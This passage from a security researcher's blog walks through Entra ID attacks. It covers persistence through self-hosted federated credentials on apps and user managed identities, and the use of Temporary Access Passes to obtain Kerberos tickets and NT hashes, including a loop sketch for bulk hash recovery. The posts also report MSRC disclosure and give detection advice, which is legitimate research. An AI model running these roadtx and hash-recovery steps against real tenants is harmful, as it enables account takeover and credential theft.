  <li>The keys document linked in the <code class="language-plaintext highlighter-rouge">jwks_uri</code> property of the Provider Configuration file.</li>
</ul>

<p>The keys document contains a public key and/or certificate that we can use to sign our tokens. The certificate is optional in this deployment; a public/private RSA or EC keypair is sufficient to make it work. If we do use a certificate, it can be self-signed, so we don’t need to involve a Certificate Authority. I’ll show you later how we can generate the keys and configuration with roadoidc, but let us assume for now that we have these files hosted on <code class="language-plaintext highlighter-rouge">https://roadoidcapp.azurewebsites.net</code>. This site will then become the <code class="language-plaintext highlighter-rouge">issuer</code> of our tokens.</p>
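<p>As a sketch of what such a keys document looks like: JWK encodes the RSA modulus and exponent as unpadded base64url integers. The parameters below are toy values for illustration only (a real 2048-bit key is generated by roadoidc, as shown later); the key ID matches the example genconfig output further down in this post:</p>

```python
import base64, json

def b64url_uint(n: int) -> str:
    """Base64url-encode an integer without padding, as JWK requires."""
    data = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Toy RSA parameters for illustration only; roadoidc generates a real key.
# The "kid" must match the one referenced in the tokens we later sign.
modulus, exponent = 0xC0FFEE, 65537
jwks = {
    "keys": [{
        "kty": "RSA",
        "use": "sig",
        "kid": "54XPuTfyhvtuy94A6g2YjiL3Rx8=",
        "n": b64url_uint(modulus),
        "e": b64url_uint(exponent),
    }]
}
print(json.dumps(jwks, indent=2))
```

<p>Entra only needs the public half; the private key stays with us and is used to sign the assertions we present when authenticating.</p>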

<h1 id="configuring-federated-credentials-on-applications-and-user-managed-identities">Configuring federated credentials on applications and user managed identities</h1>
<p>We can configure the federated credential on applications in the tenant we want to target. The permissions here are identical to the permissions you would normally need to configure certificates or passwords on applications, so you would need one of the following:</p>

<ul>
  <li>Global Administrator (doh)</li>
  <li>(Cloud) Application administrator</li>
  <li>Owner privileges over the app</li>
  <li><em>Application.ReadWrite.All</em> or <em>Directory.ReadWrite.All</em> Microsoft Graph permissions</li>
</ul>

<p>We can then configure the federated credentials on an application as follows:</p>

<p><img src="/assets/img/oidc/federatedcredentials-app.png" alt="Configuring federated credentials on an app" /></p>

<p>The <code class="language-plaintext highlighter-rouge">issuer</code> should be <code class="language-plaintext highlighter-rouge">https://roadoidcapp.azurewebsites.net</code> since this is where our keys are hosted. The <em>subject identifier</em> and <em>audience</em> could be anything since we can put arbitrary strings in our tokens, so just pick something nice or leave it at the default. We can achieve the same with the <a href="https://learn.microsoft.com/en-us/graph/api/application-post-federatedidentitycredentials?view=graph-rest-1.0&amp;tabs=http">Microsoft Graph API</a>, if preferred over the portal. What is interesting is that, while technically the <code class="language-plaintext highlighter-rouge">federatedIdentityCredentials</code> property also exists on Service Principals, the Microsoft Graph API does not allow us to configure these credentials there, stating that it is not supported.</p>
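<p>If we script this via the Graph API instead of the portal, it is a single POST to the application’s <code class="language-plaintext highlighter-rouge">federatedIdentityCredentials</code> collection. A sketch of the request body (field names from the Graph documentation linked above; the audience shown is the default value Entra suggests, the object ID is a placeholder, and the issuer/subject are the example values from this post):</p>

```python
import json

app_object_id = "00000000-0000-0000-0000-000000000000"  # placeholder object ID
# Body for POST /applications/{id}/federatedIdentityCredentials
credential = {
    "name": "roadoidc",                                 # any label we like
    "issuer": "https://roadoidcapp.azurewebsites.net",  # where our keys are hosted
    "subject": "testapp",                               # arbitrary; must match our token's "sub"
    "audiences": ["api://AzureADTokenExchange"],        # default audience value
}
print(f"POST https://graph.microsoft.com/v1.0/applications/{app_object_id}/federatedIdentityCredentials")
print(json.dumps(credential, indent=2))
```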

<h2 id="user-managed-identities">User Managed identities</h2>
<p>On User Managed Identities this concept is more interesting, since we don’t normally manage credentials on them ourselves. In fact, for certificate and password credentials this is not even possible; Microsoft prohibits us from modifying these properties on the service principal representing the managed identity in Entra ID. We can, however, manage their federated credentials, provided that we have <code class="language-plaintext highlighter-rouge">Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write</code> permissions, which come with the following built-in Azure RBAC roles:</p>

<ul>
  <li>Contributor / Owner</li>
  <li>Managed Identity Contributor</li>
  <li>Azure Red Hat OpenShift Federated Credential Role</li>
</ul>

<p>With these permissions, we can configure the federated credentials on the user managed identity, and authenticate as it from anywhere, without needing to link the identity to a resource or have access to that resource. Note that this attack is only possible on User Managed Identities, not on System Managed Identities, since the latter are tied to a resource and don’t allow federated credential configuration.</p>

<p><img src="/assets/img/oidc/federatedcredentials-managed-identity.png" alt="Configuring federated credentials on a user managed identity" /></p>
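<p>Because this is an Azure resource property rather than an Entra directory object, the configuration goes through the ARM API as a PUT. The sketch below composes that request; the resource path follows the permission string above, but the subscription, resource group, identity name and <code class="language-plaintext highlighter-rouge">api-version</code> are illustrative assumptions:</p>

```python
import json

# Hypothetical resource identifiers; the provider path mirrors the RBAC
# action Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
sub, rg, uami, cred = "SUBSCRIPTION_ID", "my-rg", "my-uami", "roadoidc"
url = (f"https://management.azure.com/subscriptions/{sub}/resourceGroups/{rg}"
       f"/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{uami}"
       f"/federatedIdentityCredentials/{cred}?api-version=2023-01-31")
body = {"properties": {
    "issuer": "https://roadoidcapp.azurewebsites.net",
    "subject": "testapp",
    "audiences": ["api://AzureADTokenExchange"],
}}
print("PUT", url)
print(json.dumps(body, indent=2))
```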

<h1 id="creating-an-openid-connect-provider-with-roidoidc">Creating an OpenID Connect provider with roadoidc</h1>
<p>Before we authenticate we need to host the OpenID Connect provider configuration and the public keys somewhere Entra ID can reach them. In this case I’m hosting them as an Azure App Service, but any file host will do, including Azure Blob storage or S3 (which would be cheaper than Azure App Service). I’ve added some alternative hosting instructions in the <a href="https://github.com/dirkjanm/ROADtools/tree/master/roadoidc">roadoidc readme</a>, but the first commands would be the same.</p>

<p>We need to generate the configuration for our environment with the <code class="language-plaintext highlighter-rouge">genconfig.py</code> file, found in the <code class="language-plaintext highlighter-rouge">roadoidc</code> directory of <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a>. I suggest cloning the repository locally after installing roadtx and roadrecon, which contain all the dependencies for roadoidc as well. In my case I will be running the app at <code class="language-plaintext highlighter-rouge">roadoidcapp.azurewebsites.net</code>, which means that becomes my issuer parameter.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 genconfig.py -c testconfig.py -i https://roadoidcapp.azurewebsites.net
Saving private key to roadoidc.key
Saving certificate to roadoidc.pem
Key ID: 54XPuTfyhvtuy94A6g2YjiL3Rx8=
Saving configuration to testconfig.py
</code></pre></div></div>

<p>Now move the config to the <code class="language-plaintext highlighter-rouge">flaskapp</code> folder so we can deploy it on Azure App Service. We can upload the app using the Azure CLI, optionally specifying the subscription to deploy to and/or an existing app service plan. The command below will create a new app service plan with the cheapest B1 tier:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mv testconfig.py flaskapp/app_config.py
cd flaskapp/
az webapp up -n roadoidcapp --sku B1
</code></pre></div></div>

<p>Once the webapp is up, verify we can reach the discovery document at <code class="language-plaintext highlighter-rouge">https://yourapp.azurewebsites.net/.well-known/openid-configuration</code>. If that works we can now authenticate to the app or user managed identity that we configured the federated credentials on.</p>

<h1 id="authenticating-with-federated-credentials-and-roadtx">Authenticating with federated credentials and roadtx</h1>
<p>Make sure you have the latest version of roadtx installed. We need to specify quite a few parameters to authenticate with federated credentials and roadtx:</p>

<ul>
  <li>The <strong>client ID</strong> of the application or user managed identity (<code class="language-plaintext highlighter-rouge">-c</code>)</li>
  <li>The <strong>tenant</strong> we want to authenticate to. Either as tenant ID or as one of the domains of the tenant (<code class="language-plaintext highlighter-rouge">-t</code>)</li>
  <li>The <strong>scope</strong> of the token we want to have, for example <code class="language-plaintext highlighter-rouge">https://graph.microsoft.com/.default</code> (<code class="language-plaintext highlighter-rouge">-s</code>)</li>
  <li>The <strong>issuer</strong> that we configured in the previous step (<code class="language-plaintext highlighter-rouge">-i</code>)</li>
  <li>The certificate and/or key that we created (<code class="language-plaintext highlighter-rouge">--cert-pem</code> and <code class="language-plaintext highlighter-rouge">--key-pem</code>)</li>
  <li>The <strong>subject</strong> that we configured in the federated credential configuration (<code class="language-plaintext highlighter-rouge">--subject</code>)</li>
  <li>An optional <strong>audience</strong> if you changed it in the federated credential configuration (<code class="language-plaintext highlighter-rouge">--audience</code>)</li>
  <li>An optional <strong>key id</strong> if you chose a custom one when generating the IdP config (<code class="language-plaintext highlighter-rouge">--kid</code>)</li>
</ul>

<p>In my case, the command would be as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx federatedappauth -c 8a2c36aa-66fb-46cd-9b2d-b94a4945e0a9 --cert-pem roadoidc.pem --key-pem roadoidc.key --subject testapp -t iminyour.cloud --issuer https://roadoidcapp.azurewebsites.net/ -s https://graph.microsoft.com/.default 
</code></pre></div></div>

<p>This will request a token using the client credentials grant flow, using a federated assertion instead of a certificate based assertion, which is <a href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-client-creds-grant-flow#third-case-access-token-request-with-a-federated-credential">somewhat documented</a> in the Identity Platform documentation. The output of this command will be an access token in the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file.</p>
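<p>Under the hood, roadtx builds a self-issued assertion and posts it in a client credentials request. The sketch below constructs the token structure and form body; in reality the assertion must be signed with RS256 using <code class="language-plaintext highlighter-rouge">roadoidc.key</code>, so the placeholder signature here would of course be rejected by Entra. The client ID and scope are the ones from the roadtx command above:</p>

```python
import base64, json
from urllib.parse import urlencode

def b64url(obj) -> str:
    """Base64url-encode a JSON object without padding (JWT segment)."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Claims of our self-issued assertion: "iss" is our own IdP, and "sub"/"aud"
# must match the federated credential configuration on the app.
header = {"alg": "RS256", "typ": "JWT", "kid": "54XPuTfyhvtuy94A6g2YjiL3Rx8="}
claims = {"iss": "https://roadoidcapp.azurewebsites.net/", "sub": "testapp",
          "aud": "api://AzureADTokenExchange"}
# Placeholder signature; the real one is RS256 over header.payload with roadoidc.key
assertion = f"{b64url(header)}.{b64url(claims)}.SIGNATURE"

# Form body of the client credentials grant using a federated assertion
token_request = urlencode({
    "grant_type": "client_credentials",
    "client_id": "8a2c36aa-66fb-46cd-9b2d-b94a4945e0a9",
    "scope": "https://graph.microsoft.com/.default",
    "client_assertion_type": "urn:ietf:params:oauth:client-assertion-type:jwt-bearer",
    "client_assertion": assertion,
})
```

<p>Entra resolves the <code class="language-plaintext highlighter-rouge">iss</code> claim to our discovery document, fetches the keys, verifies the signature and matches <code class="language-plaintext highlighter-rouge">sub</code> and <code class="language-plaintext highlighter-rouge">aud</code> against the configured federated credential.</p>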

<h1 id="conclusion">Conclusion</h1>
<p>This blog shows an alternative approach attackers can use to configure credentials on Entra ID applications and Azure User Managed Identities. It can help them persist in environments or even elevate privileges if they can compromise a service principal with high privileges. Federated Credentials can come from well-known identity providers, but we can also create our own minimal IdP to avoid being limited to a platform such as GitHub for our token requests. Defenders should be aware of this possibility and monitor for unexpected federated credentials that are configured on User Managed Identities and Entra ID applications. Thomas Naunheim wrote a <a href="https://www.cloud-architekt.net/identify-prevent-abuse-uami-fedcreds/">great blog with defensive guidance</a> on this same topic.</p>

<p>The tool that you can use to create your own IdP is available in the <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a> repository on GitHub in the <a href="https://github.com/dirkjanm/ROADtools/tree/master/roadoidc">roadoidc directory</a>.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Using applications and service principals for persistence and privilege escalation is a well-known topic in Entra ID (Azure AD). I’ve written about these kind of attacks many years ago, and talked about how we can use certificates and application passwords to authenticate as applications and abuse the permissions they have. In this blog, we cover a third way of authenticating as an application: using federated credentials. Federated credentials have been around for a few years, but haven’t been covered much yet from the offensive side. For Entra ID applications, there is no large difference between configuring federated credentials or regular client secrets/certificates. The more interesting part on this topic is that we can also configure federated credentials on User Managed Identities in Azure. This is unusual, because normally Managed Identities have their authentication controlled by Microsoft, and their authentication is tied to a certain resource such as a Virtual Machine. With federated credentials, we can bypass that limitation, given that we have sufficient privileges, and authenticate as this managed identity without requiring access to another resource in Azure. 
With this blog I’m also introducing a new utility to the ROADtools family: roadoidc, which can set up a minimal Identity Provider (IdP), allowing us to authenticate using federated credentials as apps and user managed identities with roadtx.]]></summary></entry><entry><title type="html">Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes</title><link href="https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/" rel="alternate" type="text/html" title="Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes" /><published>2024-05-06T13:00:57+00:00</published><updated>2024-05-06T13:00:57+00:00</updated><id>https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra</id><content type="html" xml:base="https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/"><![CDATA[<p>Temporary Access Passes are a method for Microsoft Entra ID (formerly Azure AD) administrators to configure a temporary password for user accounts, which will also satisfy Multi Factor Authentication controls. They can be a useful tool in setting up passwordless authentication methods such as FIDO keys and Windows Hello. In this blog, we take a closer look at the options attackers have to abuse Temporary Access Passes for lateral movement, showing how they can be used for passwordless persistence and even to recover on-premises Active Directory passwords in certain hybrid configurations.</p>

<p>Temporary access passes are not enabled by default. However, many tenants that primarily use passwordless forms of authentication have them enabled to allow users to configure passwordless authentication methods for the first time, or for account recovery in case these users need to reset their authentication methods. For attackers, Temporary Access Passes (TAPs) also provide interesting options, since these temporary passwords exist next to the user’s regular password, which means configuring a TAP on an account is not a destructive action like resetting the account password. The abuse of TAPs by itself is not new; there are already some great blogs that explore this concept, such as <a href="https://posts.specterops.io/id-tap-that-pass-8f79fff839ac">this blog</a> by <a href="https://twitter.com/hotnops">Daniel Heinsen from SpecterOps</a>.</p>

<p>After I read Daniel’s blog a while ago, I started playing with these TAPs to see if I could also use them with ROADtools to request tokens, and what the limitations on those tokens would be. Since TAPs can be used to configure passwordless authentication methods, it shouldn’t be a surprise that we can also use them to configure Windows Hello for Business keys on accounts, which was added to ROADtools after my Windows Hello talks <a href="/talks/">last year</a>. I’ll describe the steps for this below. What I found more interesting during my research is that TAPs can be used for lateral movement in hybrid environments as well, where the use of a TAP in Entra would allow the attacker to authenticate against the on-premises Active Directory. It would even allow the attacker to recover the NT hash of the victim account, which might be used to recover the account’s plaintext password. The hybrid lateral movement part is only applicable if Cloud Kerberos Trust is used, which gives Entra ID the ability to issue Kerberos tickets for on-prem identities.</p>

<h2 id="configuring-taps">Configuring TAPs</h2>
<p>Temporary Access Passes can be configured by admins, provided that the feature is enabled and the admin has sufficient rights to do so. The requirements and methods are quite clearly laid out in the <a href="https://learn.microsoft.com/en-us/entra/identity/authentication/howto-authentication-temporary-access-pass#create-a-temporary-access-pass">TAP documentation</a> from Microsoft. We can also do it over the Microsoft Graph REST API; however, that would require a token with the <code class="language-plaintext highlighter-rouge">UserAuthenticationMethod.ReadWrite.All</code> delegated permission. Unfortunately for us, there aren’t any built-in Microsoft apps that I’m aware of that have this kind of access, so our best bet is to use the Azure/Entra portal or to borrow a token from that portal and use that with PowerShell or the <a href="https://learn.microsoft.com/en-us/graph/api/authentication-post-temporaryaccesspassmethods?view=graph-rest-1.0&amp;tabs=http#request">REST API</a>. In this case we’ll stick to the Azure Portal to configure the temporary access pass.</p>
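<p>For reference, a sketch of what the Graph request for creating a TAP looks like if we do borrow a suitable token (field names from the Graph documentation linked above; the values and UPN are illustrative, matching the test account used later in this post):</p>

```python
import json

user = "hybrid@hybrid.iminyour.cloud"  # target user from the examples below
# Body for POST /users/{user}/authentication/temporaryAccessPassMethods
tap_request = {
    "lifetimeInMinutes": 60,  # keep this short to avoid prompting the real user
    "isUsableOnce": True,     # single use further limits exposure
}
print(f"POST https://graph.microsoft.com/v1.0/users/{user}/authentication/temporaryAccessPassMethods")
print(json.dumps(tap_request, indent=2))
```

<p>The response contains the generated pass in the <code class="language-plaintext highlighter-rouge">temporaryAccessPass</code> property, which we can then use to authenticate as the user.</p>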

<p><img src="/assets/img/tap/tap_configure.png" alt="Configuring a TAP" /></p>

<p>Temporary Access Passes act as alternative credentials for the user, which means we can use them without interrupting the legitimate user. This is a big advantage over destructive actions like password resets, which will invalidate the user’s current sessions and likely cause some complaints. Since the TAP also counts as MFA, we don’t need to worry about the user receiving notifications or text messages from MFA prompts either. Now that we have a TAP, let’s see what we can do to convert this into persistent access.</p>

<h2 id="abusing-the-tap-for-lateral-movement">Abusing the TAP for lateral movement</h2>
<p>The TAP itself is only valid during the configured lifetime. While we can influence this when creating the TAP, a longer validity might also be suspicious, because the TAP automatically becomes the preferred authentication method during its lifetime. To minimize the chance of the legitimate user being prompted for the TAP, we can make its lifetime as short as possible, or allow it to only be used once.</p>

<h3 id="configuring-windows-hello-for-business-keys-with-a-tap">Configuring Windows Hello for Business keys with a TAP</h3>
<p>To configure Windows Hello for Business, we need to have some special tokens. This process is very similar to the flow from <a href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/">my last blog</a> where we used the special permissions of the Microsoft Authentication Broker to request a token that we can upgrade to a PRT. This flow is also similar to how Windows upgrades Primary Refresh Tokens to include an MFA claim after obtaining them with only a password. In this flow we don’t use the authentication method directly in the PRT request, but we use a special refresh token that acts as an intermediary.</p>

<p>Windows Hello provisioning also requires us to have a device in the tenant. Lucky for us, registering or joining devices is enabled in almost all tenants, so if we do not have access to an existing device we can register or join one as part of the flow. We could technically abuse an existing device here, but that would complicate the process, especially if there is a TPM involved.</p>

<p>The first step is to authenticate using the TAP, using the <code class="language-plaintext highlighter-rouge">prtenrich</code> command from <a href="https://github.com/dirkjanm/ROADtools">roadtx</a>. This command also works without an existing PRT if we use the <code class="language-plaintext highlighter-rouge">--no-prt</code> flag, which allows us to use a TAP for authentication.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich -u hybrid@hybrid.iminyour.cloud --no-prt
</code></pre></div></div>

<p>This will prompt us for the TAP (which is now the preferred authentication method), and give us a refresh token. If we do not yet have a device certificate/key, we can also use this refresh token to register a device.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens --refresh-token &lt;token&gt; -c broker -r drs
</code></pre></div></div>

<p>We can join or register a device with the <code class="language-plaintext highlighter-rouge">device</code> module:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx device -n blogtest2 -a register
</code></pre></div></div>

<p>And with our newly registered device we can get a PRT:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -r &lt;refreshtoken&gt; -c blogtest2.pem -k blogtest2.key
</code></pre></div></div>

<p>The output of these commands should look somewhat like this:</p>

<p><img src="/assets/img/tap/get_device_prt.png" alt="Request a PRT" class="align-center" /></p>

<p>Unfortunately for us, this PRT is only going to be valid for as long as the TAP itself. It does not say so in the expiry time, but it will get refused after the TAP expiry:</p>

<p><img src="/assets/img/tap/tap_expired_prt.png" alt="PRT expires with the TAP" class="align-center" /></p>

<p>If we want to have actual persistence, we need to provision some additional credentials on the account. In this case, we could set up a Windows Hello key for the account, which we can then use after the TAP expires. The process to do this is very similar to the one in my <a href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/">last blog</a>. We use the <code class="language-plaintext highlighter-rouge">prtenrich</code> command again to get an access token for Windows Hello provisioning, then we register the actual hello key.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich --ngcmfa-drs-auth
roadtx winhello -k hybriduser.key
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">prtenrich</code> command should automatically proceed if we did the TAP authentication within the last 10 minutes. If not, we can just use the TAP again to comply with MFA requirements (provided the TAP was valid for multiple uses). The <code class="language-plaintext highlighter-rouge">winhello</code> command provisions the key for our user. If we want, we can use it to get a new PRT that is valid for longer and also counts as MFA:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -hk hybriduser.key -c blogtest2.pem -k blogtest2.key -u hybrid@hybrid.iminyour.cloud
</code></pre></div></div>

<p>We can use this PRT with the usual <code class="language-plaintext highlighter-rouge">prtauth</code> and <code class="language-plaintext highlighter-rouge">browserprtauth</code> to either get tokens or to browse the web as our victim.</p>

<h3 id="obtaining-nt-hashes-of-the-victim-via-a-tap">Obtaining NT hashes of the victim via a TAP</h3>
<p>So far, we didn’t see anything unexpected. After all, a TAP is a legitimate way to configure passwordless credentials, such as Windows Hello keys or FIDO keys (we wouldn’t even need to use custom tools to register a FIDO key, a browser would be sufficient). But if we take a step back and look at the PRT that we received after using the TAP, we see something unexpected:</p>

<p><img src="/assets/img/tap/prt_tgt.png" alt="PRT with TGT" class="align-center" /></p>

<p>Our PRT came with a Kerberos TGT for the on-premises Active Directory that our victim is part of. This is made possible by the Cloud Kerberos Trust feature, so it only works if that has been configured in the Entra tenant and the on-prem AD. However, it is meant to make on-premises authentication possible with Windows Hello for Business keys and FIDO keys, not necessarily with TAPs. The issue here is that while a TAP is by definition temporary, the TGT that we receive here is valid for 10 hours, which most likely exceeds the validity of the TAP itself. Furthermore, since Cloud Kerberos Trust enables recovering legacy credentials (meaning NT hashes), we can obtain the NT hash of our victim, provided that we have line-of-sight to an on-premises AD Domain Controller. The NT hash can be used to request TGTs even after the TAP has expired or our access in the cloud was revoked. If the original password of the user is relatively weak, we might also be able to recover the plaintext password by brute-forcing the NT hash with tools such as hashcat.</p>

<p>So to recap, provided we have the following:</p>

<ul>
  <li>TAPs enabled in the tenant</li>
  <li>Sufficient access to provision TAPs on our victims</li>
  <li>Cloud Kerberos trust enabled</li>
  <li>Line of sight to the on-premises AD</li>
</ul>

<p>We could obtain the NT hash for anyone we can provision a TAP for, without needing to configure persistence on their account, and all with a single device identity to leave as few traces as possible. While this list of requirements is quite long, if you do meet all of them it could be used as a somewhat noisy hash dump method, entirely controlled from Entra. There are limits on which accounts we can target with this, so users like Domain Admins (which shouldn’t be synced to Entra in the first place) are not affected. The restrictions and details of how exactly this works are covered in my <a href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/">blog on Cloud Kerberos Trust</a>.</p>

<p>Let’s perform the last step of our attack. We re-use the PRT we got at the first step, so the one requested using the TAP, before we enrolled a Windows Hello key. This PRT contains a partial TGT, which we can exchange for a full TGT using <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a>’s <code class="language-plaintext highlighter-rouge">partialtofulltgt.py</code> script.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python partialtofulltgt.py -f roadtx.prt hybrid.iminyour.cloud/hybrid
</code></pre></div></div>

<p><img src="/assets/img/tap/tap_to_nt_hash.png" alt="From TAP to NT hash" class="align-center" /></p>

<p>If we want to do this for more users, we simply provision a TAP for them too, request a TGT with the TAP and then recover the NT hash. You could write a script that loops through this and recovers as many hashes as possible, without making permanent changes to the accounts or causing impact on the real user of the account.</p>
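<p>Such a loop could be sketched as follows. The commands are only composed here, not executed, since each step requires interaction with the tenant; the TAP provisioning function is a placeholder, and the device certificate names are the ones from the earlier examples:</p>

```python
def provision_tap(upn: str) -> str:
    # Placeholder: in practice, create the TAP via the portal or the Graph API
    return "<tap>"

def attack_steps(upn: str) -> list:
    """Compose the per-user commands for the flow described above."""
    user = upn.split("@")[0]
    return [
        f"roadtx prtenrich -u {upn} --no-prt",                      # authenticate with the TAP
        "roadtx prt -r <refreshtoken> -c blogtest2.pem -k blogtest2.key",  # request PRT + partial TGT
        f"python partialtofulltgt.py -f roadtx.prt hybrid.iminyour.cloud/{user}",  # recover NT hash
    ]

for upn in ["hybrid@hybrid.iminyour.cloud"]:
    tap = provision_tap(upn)
    for cmd in attack_steps(upn):
        print(cmd)
```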

<h1 id="disclosure-prevention-and-detection">Disclosure, prevention and detection</h1>
<p>While many parts of this follow the design principles, the ability to obtain a long-term key (NT hash) with a Temporary Access Pass seemed like a vulnerable feature of the protocol to me. Microsoft did consider it a valid finding when I reported it to MSRC, but not one of immediate concern because of the high privilege requirements, and the fact that an admin in that position would also be able to compromise an on-premises account through something like password write-back, if that is enabled in the tenant.</p>

<p>I agree with them that the privileges required are high, that it is not a default configuration, and that there are other options to abuse the privileges these roles have. However, I still think that temporary passwords should not immediately give access to long-term keys. From a pentester point of view, I also find it an interesting attack since it is non-disruptive to the actual user, which during a red team or pentest engagement is a big advantage. Since this feature will not be addressed in the immediate future, it is something that could be abused by attackers in the lateral movement / post exploitation stage of their attacks.</p>

<p>My recommendations if you have a setup where these features are present would be as follows:</p>

<ul>
  <li>Avoid syncing accounts that have privileged rights in Active Directory to Entra ID.</li>
  <li>Make sure to scope the Temporary Access Pass authentication method only to regular users, and not to admin accounts that may be synced from on-premises (even though I just told you not to do that).</li>
  <li>Monitor for assignments of Temporary Access Passes on sensitive accounts, especially in high volume.</li>
  <li>Monitor for large numbers of users signing in “from” the same device, which is the event that is generated when a PRT is issued.</li>
  <li>Require compliant or hybrid joined devices for sign-in to prevent fake devices that are registered by attackers from being used to access applications.</li>
</ul>

<p>As usual, ROADtools is available via <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> or via PyPI via <code class="language-plaintext highlighter-rouge">pip install roadtx</code>. <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a> is available as a collection of standalone scripts on GitHub.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Temporary Access Passes are a method for Microsoft Entra ID (formerly Azure AD) administrators to configure a temporary password for user accounts, which will also satisfy Multi Factor Authentication controls. They can be a useful tool in setting up passwordless authentication methods such as FIDO keys and Windows Hello. In this blog, we take a closer look at the options attackers have to abuse Temporary Access Passes for lateral movement, showing how they can be used for passwordless persistence and even to recover on-premises Active Directory passwords in certain hybrid configurations.]]></summary></entry><entry><title type="html">Phishing for Primary Refresh Tokens and Windows Hello keys</title><link href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" rel="alternate" type="text/html" title="Phishing for Primary Refresh Tokens and Windows Hello keys" /><published>2023-10-10T16:08:57+00:00</published><updated>2023-10-10T16:08:57+00:00</updated><id>https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens</id><content type="html" xml:base="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/"><![CDATA[<p>In Microsoft Entra ID (formerly Azure AD, in this blog referred to as “Azure AD”), there are different types of OAuth tokens. The most powerful token is a Primary Refresh Token, which is linked to a user’s device and can be used to sign in to any Entra ID connected application and web site. 
In phishing scenarios, especially those that abuse legitimate OAuth flows such as device code phishing, the resulting tokens are often limited in scope or usage methods. In this blog, I will describe new techniques to phish directly for Primary Refresh Tokens, and in some scenarios also deploy passwordless credentials that comply with even the strictest MFA policies.</p>

<h1 id="tokens-and-limitations">Tokens and limitations</h1>
<p>Just to have a short recap, there are different token types in Azure AD that each have their own limitations:</p>

<ul>
  <li><strong>Access tokens</strong>, which can be used to talk to APIs and access resources, for example over the Microsoft Graph. They are tied to a specific client (the application that requested them), and a specific resource (the API that you are accessing).</li>
  <li><strong>Refresh tokens</strong>, which are issued to applications to obtain new access tokens, since access tokens have a relatively short lifetime. They can only be used by the application they were issued to, or in some cases by a group of applications.</li>
  <li><strong>Primary Refresh Tokens</strong>, which are used for Single Sign On on devices that are Azure AD joined, registered or hybrid joined. They can be used both in browser sign-in flows to web applications and for signing in to mobile and desktop applications running on the device. I have covered Primary Refresh Tokens (PRT) <a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">single sign on</a>, <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">stealing</a>, <a href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/">abuse</a> and <a href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/">lateral movement</a> extensively in many of my blogs and <a href="https://dirkjanm.io/talks/">talks</a>.</li>
</ul>

<p>Access tokens are the only tokens that can be used to access data. (Primary) Refresh tokens can be used to request an access token, but cannot be used directly to talk to services that use Azure AD for authentication. The security of these tokens also requires that you cannot use an access token to obtain a refresh token, since that would allow you to “upgrade” your token to a more powerful token than you had initially.</p>
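<p>This hierarchy is visible in the tokens themselves: an access token is a JWT whose payload states which client requested it and which resource it is scoped to. As a minimal sketch (using a synthetic, unsigned token built inside the snippet and a placeholder client ID, not a real Azure AD token):</p>

```python
import base64
import json

def b64url(data: bytes) -> str:
    # Base64url encoding without padding, as used in JWTs
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def decode_jwt_payload(token: str) -> dict:
    # A JWT is header.payload.signature; we only inspect the payload here
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore the stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Synthetic token for demonstration only; the client ID is a placeholder
header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
claims = {
    "aud": "https://graph.microsoft.com",  # resource the token is scoped to
    "appid": "00000000-0000-0000-0000-000000000000",  # requesting client
}
token = f"{header}.{b64url(json.dumps(claims).encode())}."

decoded = decode_jwt_payload(token)
print(decoded["aud"])  # -> https://graph.microsoft.com
```

<p>A refresh token, by contrast, is an opaque blob to the client; its binding to a client (or group of clients) is enforced server-side when it is redeemed.</p>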

